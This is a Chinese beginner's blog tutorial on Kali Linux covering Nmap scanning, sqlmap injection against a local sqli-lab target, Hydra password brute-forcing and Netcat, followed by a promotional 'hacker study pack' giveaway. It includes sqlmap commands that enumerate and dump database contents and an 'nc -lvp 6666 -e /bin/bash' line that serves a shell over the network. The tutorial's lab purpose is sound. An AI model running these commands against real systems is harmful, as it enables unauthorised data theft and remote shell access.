唠嗑两句
各位未来的“网络安全工程师”们,想必你们都听过 Kali Linux 的大名,江湖人称“黑客最爱的系统”。 那么问题来了,Kali 到底是啥?菜鸟用 Kali 都能干点啥?别慌,今天就让咱来给你扒个底朝天!
一、Kali Linux 到底是何方神圣?
Kali Linux,说白了就是个渗透测试专用的 Linux 操作系统,它可是 BackTrack 的“升级版”。当年 BackTrack 觉得单打独斗太累,于是拉来了 IWHAX、WHOPPIX 和 Auditor 这三位好汉,组了个团,摇身一变成了 Kali Linux。
本质上,Kali 还是个 Linux 系统,只不过它自带了各种“神兵利器”,省去了你到处搜罗、安装工具的麻烦。 至于为啥黑客们都爱它,那还不是因为它工具齐全,用起来省心省力嘛!
二、手把手教你“领养”一只 Kali
Kali 的官方网站:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
Kali 团队还在不断更新,现在最新的版本是 Kali Purple,据说里面塞满了更多“防御型”工具。
下载解压后,用 VMware 打开就行了。 默认的 root 账号密码都是 kali。 如果你是 VMware 新手,建议先去网上找找教程。 还有,新手可能会遇到虚拟机连不上网的问题。 建议你先用“直接连接”模式,等搞懂了网卡和网段的知识,再自己配置也不迟。(操作步骤:虚拟机 -> 设置 -> 网络适配器 -> 桥接模式 -> 复制物理网络连接状态)
三、Kali 常用工具大盘点:新手村也能用的神器!
正如前面所说,Kali 就像个百宝箱,塞满了各种黑客工具和网络安全工具。 可以说,黑客想干的那些事儿,都能在这个系统里找到对应的工具。 下面就给大家推荐几个适合新手入门的小工具:
1. Nmap:网络世界的“天眼”
Nmap 被誉为“诸神之眼”,是一款超级强大的网络探测工具。 它能发现主机、扫描端口,还能跑漏洞扫描脚本,简直是居家旅行、摸清家底的必备神器!
Nmap 最最基础的用法:
nmap [目标 IP 地址]
nmap 192.168.1.10
nmap [目标网段]
nmap 192.168.1.0/24
Nmap 还提供了各种扫描参数,让你可以定制扫描结果。 举几个栗子:
添加不同的参数,就能看到不同的扫描结果,简直不要太灵活!
2. Sqlmap:SQL 注入一把梭
Sqlmap 是一款自动化 SQL 注入探测工具,支持各种操作系统和数据库。 渗透测试人员经常调侃:“没有什么技术含量,就是 sqlmap 一把梭,屏幕绿了就下班!”
Sqlmap 的基本用法:
sqlmap -u "www.baidu.com"
温馨提示:未经授权,请勿对公共网络资产进行批量扫描,小心喜提“缝纫机”一台!
下面以 sqli-lab 靶场为例:
如果出现上图中的绿色信息,说明 sqlmap 成功注入了该参数。 注意,URL 中要以 GET 方式输入参数 id(/?id),否则 sqlmap 可没法工作哦!
找到注入点后,就可以按以下步骤操作:
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --dbs # 获取当前数据库服务开启的数据库名称
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 --tables # 获取某数据库下的所有表名
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 --columns # 获取 D 数据库下 T 表内的所有字段
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 -C 字段名 --dump # 将该字段的内容全部获取出来并存储,在最后的信息中会有存储路径信息
第一步,获取数据库:
第二步,获取数据库下的表名:
第三步,获取该表字段(其实到表名这一步,可以直接 --dump 获取表里所有内容):
所以,sqlmap 的难点在于如何找到注入点,也就是找到产生 SQL 注入的参数。 在这个例子里,参数是 GET 方式上传的 "id" 参数。 下面再给大家提供一些 sqlmap 常用参数:
3. Hydra:密码爆破界的“九头蛇”
Hydra,又称“九头蛇”,是一款高效的多协议爆破工具。 它可以对指定 IP 的指定服务进行爆破,你需要提供爆破字典,或者指定爆破数据(比如已知账号为 admin 时,爆破密码)。
Kali 中,Hydra 有图形化和命令行两种使用方式:
对于新手来说,图形化界面更加简单易用。 下面简单介绍一下图形化界面的使用方法:
设置好参数后,点击 "start" 按钮,Hydra 就会用字典中的所有账号密码去尝试登陆了。
4. Netcat:网络界的“瑞士军刀”
Netcat,简称 nc,是一款超级常用的网络工具。 它基于 Socket 协议,支持 TCP 和 UDP 连接。 有了 nc,你几乎可以建立任何类型的连接。 在渗透测试中,通常用它来获取目标 IP 的 Shell。
nc 的简单用法:建立连接,传输信息
主机 1:开启对 6666 端口的监听
nc -lvp 6666
参数解释:
主机 2:连接主机 1 的 6666 端口
nc 192.168.0.163 6666
nc 常用用法:获取远程主机 Shell
- 正向连接 Shell
主机 1:
nc -lvp 6666 -e /bin/bash
参数解释:
这里将主机 1 的 /bin/bash 重定向到了自己主机的 6666 端口。
主机 2:
nc 192.168.0.163 6666
思考一下,为什么左边会有下面的报错呢? 并且在执行 sudo su 尝试进入 root 权限时,必须在左侧主机输入密码才可以进入,进入后才会收到来自右侧发来的密码 kali 并且产生报错。 可以尝试了解不同终端 bash/zsh/sh 的区别。
总结
本文只是简单介绍了 Kali 系统,希望能给那些对网络安全感兴趣的小白们一个入门引导。 记住,安全之路,永无止境! 祝各位早日成为网络安全界的大佬!
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
